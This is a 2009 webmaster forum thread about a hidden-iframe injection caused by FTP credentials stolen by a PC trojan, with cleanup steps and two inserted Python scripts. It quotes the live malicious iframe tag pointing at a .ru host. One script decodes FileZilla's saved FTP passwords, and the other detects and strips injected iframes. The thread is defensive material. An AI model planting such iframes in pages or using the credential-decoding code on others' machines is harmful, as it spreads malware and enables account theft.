Iframe injection attack (Help please)

photoshopfreak

Hi, I need help understanding the iframe injection attack and how it is performed by the hacker, and furthermore how it affects different accounts on my VPS. The reason I need to know is below:

I got an email from Google saying that they added one of my sites to their list of ‘bad ware sites’, the email was as follows:

Subject: Malware notification regarding *************.com
Date: 01/09/2009 19:07:08 GMT Daylight Time
From: [email protected]
To: abuse@*************.com, admin@*************.com, administrator@*************.com, contact@*************.com, info@*************.com, postmaster@*************.com, webmaster@*************.com

Dear site owner or webmaster of *************.com,

We recently discovered that some of your pages can cause users to be infected with malicious software. We have begun showing a warning page to users who visit these pages by clicking a search result on Google.com.

Below are some example URLs on your site which can cause users to be infected (space inserted to prevent accidental clicking in case your mail client auto-links URLs):

http://************* .com/
http://www.************* .com/

Here is a link to a sample warning page:
http://www.google.com/interstitial?url=http://*************.com/

We strongly encourage you to investigate this immediately to protect your visitors. Although some sites intentionally distribute malicious software, in many cases the webmaster is unaware because:

1) the site was compromised
2) the site doesn't monitor for malicious user-contributed content
3) the site displays content from an ad network that has a malicious advertiser


If your site was compromised, it's important to not only remove the malicious (and usually hidden) content from your pages, but to also identify and fix the vulnerability. We suggest contacting your hosting provider if you are unsure of how to proceed. StopBadware also has a resource page for securing compromised sites:
StopBadware.org - Tips for Cleaning & Securing Your Website

Once you've secured your site, you can request that the warning be removed by visiting
My site's been hacked - Webmasters/Site owners Help
and requesting a review. If your site is no longer harmful to users, we will remove the warning.

Sincerely,
Google Search Quality Team


This site did not contain spyware (that I knew of), so I did an audit by date modified via FTP to see if any files had been hacked; checking the recently modified files, I discovered they did contain an iframe:

Do not visit the URL (as it contains a virus)
<iframe src="http://u7n.ru:8080/index.php" width=177 height=158 style="visibility: hidden"></iframe>

I removed the above code from one of my sites, then proceeded to check the others; all contain the above code or similar code (different URL), and all index.(xxxx) files on affected accounts have had the above JavaScript inserted.

What I need to know is: how did they get in, and how do I prevent this from happening again? Because if I put these files back from backups, they will just be open to exploit again.

I contacted my host to ask how the hackers did it and how to prevent it from happening again, they said:

We are sorry to hear that you are facing this problem. This kind of attack is known as an iframe injection attack, which only affects the index.xxx files. This is caused either by weak FTP passwords or by some vulnerability in the scripts. As you said the passwords are strong, the latter may be the cause in your case. Still, I recommend you reset all the passwords of the accounts and then audit them.


I am certain they don't have my password, as I have RoboForm and never manually enter passwords or use my hosting passwords elsewhere; besides, my hosting passwords are 'strong' (but I will be changing them all in case).

So I suspect they may have inserted the code via a vulnerability in one of the scripts.

However, if one script was vulnerable, say for instance (vBulletin or phpBB) on one account/site on the VPS:

  1. Then how did they modify and insert code into other sites/accounts on the VPS that were not using the script?
  2. Why were some accounts not affected by the ‘iframe injection attack’?
  3. What is the best way to find out exactly where the vulnerability is and how the hacker did what they did?
  4. Any other security advice or ways to 'lockdown' a VPS?

I really need help understanding this, as I have a VPS with around 21 accounts (my sites), all using different passwords and scripts; I'm not host savvy at all.

Just removing this simple insertion from each index file is an enormous task due to the number of accounts and index files, not to mention my visitors getting viruses.

The only good thing that happened was that Google informed me of the attack, and very quickly (i.e. 1 day). The price to pay: Google labeling my sites as badware.
Hi, me too, I have this problem. You will remove this code and the code will be injected again; you just need to change the FTP password of all your sites, including the root user of your VPS.
This solution works for me
You need to check that your web application does not have any holes. Double-check updates. It is recommended to change web host, just in case.
I have researched the iframe injection attack on the web and discovered that a virus named kriptik (sp) infects PCs, then sends the FTP login info (from the FTP program) to a remote machine to access the sites and then inject the code.

I was aware that a few days ago I had a major infection on my PC; it was that bad that I could not even get Windows to load, even in safe mode. Eventually I had to repair Windows XP three times. Then I spent two days finding the spyware; I just got clean today.

So when I found my sites hacked I was extremely unhappy, as it happened twice; in reality it happened once!

So as careful as I am with passwords, they still got them due to a PC virus.


Whilst typing this, all the sites that I cleared are now reinfected again, with more notices from Google about badware. So now that I know the cause, I can get to work and stop this dead.

Thanks for your replies.
The three-character domain followed by .ru, .kw, .cn or any other TLD, followed by a port designation (:8080), has been the result of compromised FTP credentials.

photoshopfreak is correct. It is a series of viruses implanted on various PCs (and some Macs we've seen) that does little more than steal FTP credentials.

It works in a variety of ways.

First, it knows the files and their default locations for various FTP programs: FileZilla, WS_FTP and many, many others. When users tell their software to save their logon credentials, it saves this information in a file on the computer. Then when you want to send an update to your website, the login information is already there.

The virus looks for these files, opens them, reads the information and then sends it to a server where it's used to login to the website with valid credentials. There's no need to "crack" the password. Which is why strong passwords aren't a defense in this case.

Second, the virus installs a keyboard logger. This variant is relatively new because earlier this year the hackers saw that everyone was telling people not to save their FTP username and passwords, so the hackers started installing keyboard loggers for those who type their passwords in each time. Same follow-through, the stolen information is sent to a server that infects the web site.

Third, the virus "sniffs" the FTP traffic leaving the PC. Since FTP transmits all data, including username and password, in plain text, it's easy for the virus to see the username and password, capture it, send it to a server and ... (you get the idea).

Fourth, and is the most recent, the virus will inject the malscript (the infectious iframe) into the FTP data stream as it leaves the user's PC. This latest variant is sneaky in that the website logs will show that FTP traffic originated from a valid source, with valid FTP credentials.

The best way I've found to combat this is by following these steps:

Step 1: Install a new anti-virus program. Obviously this virus knows how to evade detection of the current anti-virus. It doesn't matter what's being used currently, you have to install something different.

Step 2: Login to your control panel at your web hosting provider's site and change your FTP password. Write it down. At this point, DO NOT ACCESS YOUR SITE with FTP until you finish all of these steps.

Step 3: Scan and clean every PC that has FTP access to your site. This is also a must. Otherwise you have no idea whose PC it is. Do not give the new FTP passwords to anyone until after you have finished all of these steps.

Step 4: Remove the malicious code from your webpages. If you have a known good back-up, use that. If not, download your site (yes, you'll have to type in the new password, but hopefully you've already scanned and cleaned your PC). Then open each file in your HTML editor and find the infectious code. This particular malscript usually hides immediately after the opening body tag, but we've also seen it at the end of files. You'll have to check every file on your website, not just index files or just html files. Check every file on your website, even .js and .css files.

Step 5: Change your FTP passwords again.

Step 6: If you've been blacklisted by Google, login to your Google Webmaster Tools and verify your site if you haven't already, then request a review. You'll have to click on your site, then across the top of your dashboard you'll see a label on a dark background that says "This site may be distributing malware. More Details" (More Details is a link). Click on that and request a review. If your site is clean, Google should bless you with removing that warning from SERPs.

Then you shouldn't have that issue again.

This is not the result of a faulty script or weak FTP passwords. It's the result of a virus on a PC with FTP access to the infected website.

If you have further questions regarding this, post here and I'll try to help.
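WeWatch's first point above, the saved-credentials file, as an added example (not code from this thread, from FileZilla, or from the malware described). It parses a constructed copy of FileZilla's sitemanager.xml; the hosts, users and passwords in it are made up, and the file location helper only covers the Windows and Linux/Mac paths FileZilla uses. Older FileZilla 3 builds wrote the password in the clear and later ones base64-encode it, which is encoding rather than encryption, so any process running as the same user (the trojan included) gets the password back without a key. Recent versions can protect the file with a master password; that form is not handled here.

```python
"""Recover saved FTP sites from FileZilla's sitemanager.xml.

Added example: shows why a 'strong' FTP password is no defence once malware
runs on the PC that has the password saved.
"""
import base64
import os
import xml.etree.ElementTree as ET

# Constructed stand-in for a real sitemanager.xml.  Hosts and credentials are made up.
SAMPLE_SITEMANAGER = """<FileZilla3 version="3.3.0">
  <Servers>
    <Server>
      <Host>ftp.site-one.example</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <User>siteone</User>
      <Pass>Tr0ub4dor&amp;3</Pass>
      <Name>site one</Name>
    </Server>
    <Server>
      <Host>ftp.site-two.example</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <User>sitetwo</User>
      <Pass encoding="base64">Y29ycmVjdC1ob3JzZS1iYXR0ZXJ5</Pass>
      <Name>site two</Name>
    </Server>
  </Servers>
</FileZilla3>
"""


def default_sitemanager_path():
    """Where FileZilla keeps the file: %APPDATA%\\FileZilla on Windows, ~/.config/filezilla elsewhere."""
    if os.name == "nt":
        return os.path.join(os.environ.get("APPDATA", ""), "FileZilla", "sitemanager.xml")
    return os.path.expanduser("~/.config/filezilla/sitemanager.xml")


def parse_sitemanager(xml_text):
    """Return [(host, port, user, password)] for every saved site that stores a password.

    A <Pass> without an encoding attribute is the cleartext form; encoding="base64"
    is undone with a single decode.  Neither needs a key.
    """
    root = ET.fromstring(xml_text)
    sites = []
    for server in root.iter("Server"):
        host = server.findtext("Host", "")
        port = int(server.findtext("Port", "21"))
        user = server.findtext("User", "")
        pass_el = server.find("Pass")
        if pass_el is None or not pass_el.text:
            continue  # anonymous or 'ask for password' entries hold no secret
        if pass_el.get("encoding") == "base64":
            password = base64.b64decode(pass_el.text).decode("utf-8")
        else:
            password = pass_el.text
        sites.append((host, port, user, password))
    return sites


if __name__ == "__main__":
    # Audit your own machine: list the accounts a thief would have got, without printing secrets.
    path = default_sitemanager_path()
    if os.path.exists(path):
        with open(path, encoding="utf-8") as fh:
            for host, port, user, _pw in parse_sitemanager(fh.read()):
                print(f"saved credential: {user}@{host}:{port}")
    else:
        for host, port, user, _pw in parse_sitemanager(SAMPLE_SITEMANAGER):
            print(f"(sample) saved credential: {user}@{host}:{port}")
```

Every account the script lists is one whose password must be changed after a PC infection, whether or not it was typed in recently; the same goes for the equivalent files of WS_FTP and the other clients WeWatch mentions.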
Just work on this in pair with your web hosting provider. They must have more experience on this
•••
WeWatch, do you know of any good FTP programs that encrypt and lock the data in the saved sites list, or are more secure generally?

I have cleaned my desktop now, scanned with everything going, lol, but the laptop needs the same doing to it, so until that is clean I'm not using FTP on there.
I had the same problem, a bit worse. Guys, if you are having this iframe injection attack then check all your .htaccess files, because you might find those have all been replaced by this virus. To get everything clear I had to:

* Scan and clean my PC (formatted it in my case)
* Change all your FTP passwords and use SFTP if you can
* Change your hosting and database passwords
* Check all files for this code, not just index pages. I found it everywhere you have a <body> tag
* Check all your .htaccess files; you might find one in every folder, created by this virus
* Check your CHMOD file permissions

If you use Dreamweaver you can get rid of this iframe easily. Go to Edit and select Find and Replace. Put the iframe code in the Find box and put just a space or leave the Replace box blank. Also select the right option in "Find in".
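The cleanup that WeWatch's Step 4 and the post just above both describe (check every file, not only index.* or .html; look for .htaccess files the virus dropped in each folder; check permissions) as one script you can run on the VPS itself or on a downloaded copy of the site. This is an added example, not the Iframe.Attack tool, a Dreamweaver find-and-replace or any poster's code. It assumes Python 3 and treats an iframe as injected when it is styled invisible or its src points at a host with an explicit port (the u7n.ru:8080 pattern in the thread); that is a heuristic, so read every hit before passing --clean, and delete the .infected copies it leaves behind once you have reviewed them.

```python
"""Hunt the hidden-iframe malscript across a whole site tree.

Added example for this thread, not the Iframe.Attack tool or any poster's code.
Usage:  python3 scan_site.py /path/to/site          (report only)
        python3 scan_site.py /path/to/site --clean  (also strip the iframes)
"""
import os
import re
import stat
import sys

# One <iframe ...> element, with its empty closing tag when present.
IFRAME_RE = re.compile(r'<iframe\b[^>]*>(?:\s*</iframe\s*>)?', re.I | re.S)
SRC_RE = re.compile(r'\bsrc\s*=\s*["\']?([^"\'\s>]+)', re.I)
# The styles the malscript uses to keep the frame off-screen for the visitor.
HIDDEN_RE = re.compile(r'visibility\s*:\s*hidden|display\s*:\s*none', re.I)
# A src such as http://u7n.ru:8080/... (bare host plus explicit port) is the tell the
# posters describe.  Heuristic: a legitimate embed served on :8443 would match too.
PORTED_HOST_RE = re.compile(r'^https?://[^/\s]+:\d+', re.I)


def is_malicious_iframe(tag):
    """True when one <iframe> tag is hidden or points at host:port."""
    src = SRC_RE.search(tag)
    if src and PORTED_HOST_RE.match(src.group(1)):
        return True
    return HIDDEN_RE.search(tag) is not None


def find_iframes(text):
    """Every injected-looking iframe tag in one file's text, in order."""
    return [m.group(0) for m in IFRAME_RE.finditer(text)
            if is_malicious_iframe(m.group(0))]


def scan_tree(root, max_bytes=2_000_000):
    """Walk every regular file under root (index.*, .js, .css, everything).

    Returns {"iframes": [(relpath, src)], "htaccess": [(relpath, mtime)],
             "world_writable": [relpath]}.
    """
    report = {"iframes": [], "htaccess": [], "world_writable": []}
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            st = os.lstat(path)
            if not stat.S_ISREG(st.st_mode):
                continue
            if st.st_mode & stat.S_IWOTH:            # chmod 666/777: anyone can write
                report["world_writable"].append(rel)
            if name == ".htaccess":                  # one in every folder is a red flag
                report["htaccess"].append((rel, int(st.st_mtime)))
            if st.st_size > max_bytes:               # skip large binaries
                continue
            with open(path, "rb") as fh:
                text = fh.read().decode("latin-1")   # lossless; the tags are ASCII
            for tag in find_iframes(text):
                src = SRC_RE.search(tag)
                report["iframes"].append((rel, src.group(1) if src else tag))
    return report


def clean_file(path):
    """Strip injected iframes from one file, keeping the original as <path>.infected.

    Returns the number of tags removed (0 means the file was left untouched).
    """
    with open(path, "rb") as fh:
        raw = fh.read()
    text = raw.decode("latin-1")
    bad = find_iframes(text)
    if not bad:
        return 0
    for tag in bad:
        text = text.replace(tag, "")
    with open(path + ".infected", "wb") as fh:
        fh.write(raw)
    with open(path, "wb") as fh:
        fh.write(text.encode("latin-1"))            # same bytes back, minus the tags
    return len(bad)


def main(argv):
    if len(argv) < 2:
        print(__doc__)
        return 2
    root, do_clean = argv[1], "--clean" in argv[2:]
    report = scan_tree(root)
    for rel, src in report["iframes"]:
        removed = clean_file(os.path.join(root, rel)) if do_clean else 0
        print(f"INJECTED  {rel}  ->  {src}" + ("  [removed]" if removed else ""))
    for rel, mtime in report["htaccess"]:
        print(f"HTACCESS  {rel}  (mtime {mtime})")
    for rel in report["world_writable"]:
        print(f"WRITABLE  {rel}")
    return 1 if report["iframes"] else 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Cleaning the files is only the last step of WeWatch's list: until every PC with the FTP password has been scanned and the password changed, the script will find the same tags again on the next run, which is exactly what photoshopfreak saw.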
Talk to your host; they may have a backup and will restart your account (like new) so you can be secure. Change your database passwords as well, as it's always possible they went after those too.
If a shared account gets infected by this iframe thing, can it spread to the reseller account of it too? Because I deleted and recreated one shared account and I found there is a different iframe in it now.
If a shared account gets infected by this iframe thing, can it spread to the reseller account of it too? Because I deleted and recreated one shared account and I found there is a different iframe in it now.

If it is exactly what I had, the answer is no, it can't spread; they need the FTP info for each account, so the only way it could spread is if they had the passwords of the shared account (which they must have got) and the reseller, or they got the shared account password and it's the same password as the reseller account.

I have a VPS, which is similar to a reseller account, i.e. a bigger account that allows me to create many sites. When I got hacked, only the accounts that I had accessed via my FTP program were hacked; some accounts that I had not saved in my FTP bookmarks were unaffected, all on the same VPS.

So it's a matter of "have they got the password?", not "can it spread?", as it can only spread if they have the password.
You need to change your web host. Use the latest versions of the web application to avoid that in the future.
Before I saw this topic I had posted the same thing at DP. Someone helped me to get rid of them, though I couldn't do anything about the GoDaddy account, since they refuse to give shell access. He is the one who posted there as SecureCP. If you have a DP account, PM him and ask him to help you.

How to get rid of this iframe script?
Detect Malicious iframe with software

To get rid of the malicious iframe on my FTP server (and believe me, I was deeply invest...), I use Iframe.Attack V1.1. It's a small piece of software (in PHP, I guess) capable of scanning all your FTP looking for iframes. The software builds a listing of infected iframes and gives you the possibility to remove the malicious iframes in one shot, a great help if you have a lot of files on your server. Of course, you need to clean your own computer with your antivirus (to take off the Trojan that has stolen your FTP password), and also change your FTP password. Now my FTP seems clean.

Hope that can be helpful, moustik
Note: the software is available in English :)